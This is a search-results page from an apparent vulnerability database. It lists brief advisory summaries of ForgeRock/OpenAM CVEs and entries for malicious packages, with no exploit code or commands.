161 matches found
ForgeRock OpenAM <7.0 - Remote Code Execution
ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/ request to the server. The vulnerabilit...
LDAP Injection In OpenAM
OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration ca...
CVE-2025-20628 Insufficient granularity of access control for Remote Connector Servers in client mode
An insufficient granularity of access control vulnerability exists in PingIDM formerly ForgeRock Identity Management where administrators cannot properly configure access rules for Remote Connector Servers RCS running in client mode. This means attackers can spoof a client-mode RCS if one exists ...
EUVD-2021-23727
Malware in sbrugna...
EUVD-2016-7422
Malware in sbrugna...
EUVD-2021-23728
Malware in sbrugna...
EUVD-2017-5897
Malware in sbrugna...
EUVD-2017-5898
Malware in sbrugna...
EUVD-2020-9417
Malware in sbrugna...
EUVD-2018-19007
Malware in sbrugna...
EUVD-2023-12557
Malicious code in bioql PyPI...
EUVD-2022-43104
Malicious code in bioql PyPI...
EUVD-2023-23885
Malicious code in bioql PyPI...
EUVD-2023-12400
Malicious code in bioql PyPI...
EUVD-2021-34059
Malicious code in bioql PyPI...
EUVD-2023-12622
Malicious code in bioql PyPI...
CVE-2021-37154
In ForgeRock Access Management AM before 7.0.2, the SAML2 implementation allows XML injection, potentially enabling a fraudulent SAML 2.0 assertion...
CVE-2021-37153
ForgeRock Access Management AM before 7.0.2, when configured with Active Directory as the Identity Store, has an authentication-bypass issue...
CVE-2021-29156
ForgeRock OpenAM before 13.5.1 allows LDAP injection via the Webfinger protocol. For example, an unauthenticated attacker can perform character-by-character retrieval of password hashes, or retrieve a session token or a private key...
CVE-2020-17465
Dashboards and progressiveProfileForms in ForgeRock Identity Manager before 7.0.0 are vulnerable to stored XSS. The vulnerability affects versions 6.5.0.4, 6.0.0.6...